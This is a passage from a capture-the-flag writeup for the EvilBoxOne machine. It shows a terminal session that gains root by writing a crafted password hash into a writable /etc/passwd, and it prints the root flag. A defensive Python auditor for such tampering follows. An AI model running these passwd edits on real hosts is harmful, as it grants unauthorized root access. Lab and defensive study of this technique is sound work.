# attacker:'command_output' 'string'
# Now we need to place 'string' into /etc/passwd using echo command
# echo 'string' >> /etc/passwd

# later, we can su attacker!

mowree@EvilBoxOne:~$ echo 'attacker:$1$mDHMu235$dP3Xu6DnA067MXmUdbsme/
> ' >> /etc/passwd
mowree@EvilBoxOne:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
mowree:x:1000:1000:mowree,,,:/home/mowree:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
attacker:$1$mDHMu235$dP3Xu6DnA067MXmUdbsme/

mowree@EvilBoxOne:~$ tail etc/passwd
tail: no se puede abrir 'etc/passwd' para lectura: No existe el fichero o el directorio (tail: cannot open 'etc/passwd' for reading: No such file or directory)
mowree@EvilBoxOne:~$ cat /etc/passwd | tail -n 1

mowree@EvilBoxOne:~$ cat /etc/passwd
[... 26 lines unchanged, same as the /etc/passwd listing above ...]
attacker:$1$mDHMu235$dP3Xu6DnA067MXmUdbsme/

mowree@EvilBoxOne:~$ su attacker
su: el usuario attacker no existe (su: user attacker does not exist)
mowree@EvilBoxOne:~$ ping 8.8.8.8
connect: La red es inaccesible (connect: Network is unreachable)
mowree@EvilBoxOne:~$ ls
attack user.txt
mowree@EvilBoxOne:~$ cat attack
attacker:$1$mDHMu235$dP3Xu6DnA067MXmUdbsme/

# openssl passwd -1 password 'command_output'
# then attach attacker to this 'command_output'
# attacker:'command_output' 'string'
# Now we need to place 'string' into /etc/passwd using echo command
# echo 'string' >> /etc/passwd

# later, we can su attacker!

mowree@EvilBoxOne:~$ nano attack
mowree@EvilBoxOne:~$ cat attack
attacker:$1$mDHMu235$dP3Xu6DnA067MXmUdbsme/
attacker2:$1$mDHMu235$dP3Xu6DnA067MXmUdbsme/

# openssl passwd -1 password 'command_output'
# then attach attacker to this 'command_output'
# attacker:'command_output' 'string'
# Now we need to place 'string' into /etc/passwd using echo command
# echo 'string' >> /etc/passwd

# later, we can su attacker!

mowree@EvilBoxOne:~$ echo attacker2:$1$mDHMu235$dP3Xu6DnA067MXmUdbsme/ >> /etc/passwd
mowree@EvilBoxOne:~$ cat /etc/passwd
[... 26 lines unchanged, same as the /etc/passwd listing above ...]
attacker:$1$mDHMu235$dP3Xu6DnA067MXmUdbsme/

attacker2:/
mowree@EvilBoxOne:~$ echo "attacker2:$1$mDHMu235$dP3Xu6DnA067MXmUdbsme" >> /etc/passwd
mowree@EvilBoxOne:~$ cat /etc/passwd
[... 26 lines unchanged, same as the /etc/passwd listing above ...]
attacker:$1$mDHMu235$dP3Xu6DnA067MXmUdbsme/

attacker2:/
attacker2:
mowree@EvilBoxOne:~$ echo 'attacker2:$1$mDHMu235$dP3Xu6DnA067MXmUdbsme' >> /etc/passwd
mowree@EvilBoxOne:~$ cat /etc/passwd
[... 26 lines unchanged, same as the /etc/passwd listing above ...]
attacker:$1$mDHMu235$dP3Xu6DnA067MXmUdbsme/

attacker2:/
attacker2:
attacker2:$1$mDHMu235$dP3Xu6DnA067MXmUdbsme
mowree@EvilBoxOne:~$ nano /etc/passwd
mowree@EvilBoxOne:~$ cat /etc/passwd
[... 26 lines unchanged, same as the /etc/passwd listing above ...]
attacker:$1$mDHMu235$dP3Xu6DnA067MXmUdbsme/
attacker2:$1$mDHMu235$dP3Xu6DnA067MXmUdbsme
mowree@EvilBoxOne:~$ su attacker2
su: el usuario attacker2 no existe (su: user attacker2 does not exist)
mowree@EvilBoxOne:~$ echo 'alright. how about we replace x at root'
alright. how about we replace x at root
mowree@EvilBoxOne:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
mowree:x:1000:1000:mowree,,,:/home/mowree:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
attacker:$1$mDHMu235$dP3Xu6DnA067MXmUdbsme/
attacker2:$1$mDHMu235$dP3Xu6DnA067MXmUdbsme
mowree@EvilBoxOne:~$ echo 'root:x:0:0:root:/root:/bin/bash'
root:x:0:0:root:/root:/bin/bash
mowree@EvilBoxOne:~$ echo 'let us replace x with our hash then su root'
let us replace x with our hash then su root
mowree@EvilBoxOne:~$
mowree@EvilBoxOne:~$
mowree@EvilBoxOne:~$ echo '$1$mDHMu235$dP3Xu6DnA067MXmUdbsme'
$1$mDHMu235$dP3Xu6DnA067MXmUdbsme
mowree@EvilBoxOne:~$ nano /etc/passwd
mowree@EvilBoxOne:~$ cat /etc/passwd
root:$1$mDHMu235$dP3Xu6DnA067MXmUdbsme:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
mowree:x:1000:1000:mowree,,,:/home/mowree:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
attacker:$1$mDHMu235$dP3Xu6DnA067MXmUdbsme/
attacker2:$1$mDHMu235$dP3Xu6DnA067MXmUdbsme
mowree@EvilBoxOne:~$ su root
Contraseña:
su: Fallo de autenticación
mowree@EvilBoxOne:~$ echo 'wasn't the password passwd'
>
> "
> ^C
mowree@EvilBoxOne:~$ su root
Contraseña:
su: Fallo de autenticación
mowree@EvilBoxOne:~$ openssl passwd -1 root
$1$AI/NUW0r$4p4AeMceoB9TJDnKGnqxg1
mowree@EvilBoxOne:~$ nano /etc/passwd
mowree@EvilBoxOne:~$ su root
Contraseña:
root@EvilBoxOne:/home/mowree# id
uid=0(root) gid=0(root) grupos=0(root)
root@EvilBoxOne:/home/mowree# whoami
root
root@EvilBoxOne:/home/mowree# ls
attack user.txt
root@EvilBoxOne:/home/mowree# cd /root
root@EvilBoxOne:~# ls
root.txt
root@EvilBoxOne:~# cat root.txt
36QtXfdJWvdC0VavlPIApUbDlqTsBM
root@EvilBoxOne:~#
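Two things go wrong in the session above before the final `su root` succeeds: the `attacker` and `attacker2` records carry only a name and a hash (no uid, gid, home or shell), so `su` reports that the user does not exist, and the hash pasted for `attacker2` and then for `root` is missing the trailing `/` that `openssl passwd -1` printed, so it is 21 characters long where MD5-crypt output is always 22. Below is an added example, not part of the original writeup, of a small Python auditor that a defender can run to catch exactly these conditions: a password field in `/etc/passwd` that is anything other than the `x` placeholder (valid or malformed hash, or empty), records with the wrong number of fields, extra uid-0 accounts, and a group- or world-writable file mode. The sample records are constructed from the entries shown on this page; the function names are my own.

```python
import os
import re
import stat

# MD5-crypt layout: "$1$" + salt (1..8 chars) + "$" + exactly 22 hash chars,
# all drawn from the crypt alphabet [./0-9A-Za-z]. A 21-char hash can never verify.
MD5_CRYPT_RE = re.compile(r"^\$1\$[./0-9A-Za-z]{1,8}\$[./0-9A-Za-z]{22}$")

# Values that legitimately appear in the password field of /etc/passwd.
PLACEHOLDERS = {"x", "*", "!", "!!"}


def parse_passwd_line(line):
    """Split one /etc/passwd record into its seven fields; None if malformed."""
    fields = line.rstrip("\n").split(":")
    if len(fields) != 7:
        return None
    name, pw, uid, gid, gecos, home, shell = fields
    if not name or not uid.isdigit() or not gid.isdigit():
        return None
    return {"name": name, "pw": pw, "uid": int(uid), "gid": int(gid),
            "gecos": gecos, "home": home, "shell": shell}


def audit_passwd(text):
    """Return (severity, line_no, message) findings for the given passwd content."""
    findings = []
    for n, raw in enumerate(text.splitlines(), 1):
        if not raw.strip():
            continue
        rec = parse_passwd_line(raw)
        if rec is None:
            findings.append(("WARN", n, f"malformed record, expected 7 fields: {raw!r}"))
            continue
        name, pw = rec["name"], rec["pw"]
        if pw == "":
            findings.append(("CRIT", n, f"{name}: empty password field (passwordless login)"))
        elif pw not in PLACEHOLDERS:
            # A hash stored here is used directly by crypt(3); /etc/shadow is ignored.
            if MD5_CRYPT_RE.match(pw):
                kind = "valid MD5-crypt hash"
            elif pw.startswith("$"):
                kind = "malformed crypt hash"
            else:
                kind = "unexpected value"
            findings.append(("CRIT", n, f"{name}: password field is a {kind}"))
        if rec["uid"] == 0 and name != "root":
            findings.append(("CRIT", n, f"{name}: uid 0 but not root"))
    return findings


def mode_is_group_or_world_writable(mode):
    """True if an st_mode has the group or other write bit set (EvilBox's rw-rw-rw-)."""
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))


def check_passwd_file(path="/etc/passwd"):
    """Audit a real file: content findings plus a finding for a writable mode."""
    findings = []
    st = os.stat(path)
    if mode_is_group_or_world_writable(st.st_mode):
        findings.append(("CRIT", 0, f"{path} is writable by group or others: {oct(st.st_mode & 0o777)}"))
    with open(path, encoding="utf-8", errors="replace") as fh:
        findings.extend(audit_passwd(fh.read()))
    return findings


# Constructed sample built from the records shown in the writeup's session.
SAMPLE = """root:$1$mDHMu235$dP3Xu6DnA067MXmUdbsme:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
mowree:x:1000:1000:mowree,,,:/home/mowree:/bin/bash
attacker:$1$mDHMu235$dP3Xu6DnA067MXmUdbsme/
attacker2:$1$mDHMu235$dP3Xu6DnA067MXmUdbsme
"""

if __name__ == "__main__":
    for sev, n, msg in audit_passwd(SAMPLE):
        print(f"{sev} line {n}: {msg}")
```

Run against the constructed sample it reports the truncated root hash as malformed and the two `attacker` records as having the wrong field count; a clean file (every password field `x`, mode 0644, a single uid-0 account) produces no findings, which is the baseline a host-integrity check should enforce.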

Since I love the Hitman game and this machine's title is EvilBox, here is the cover photo for this article.
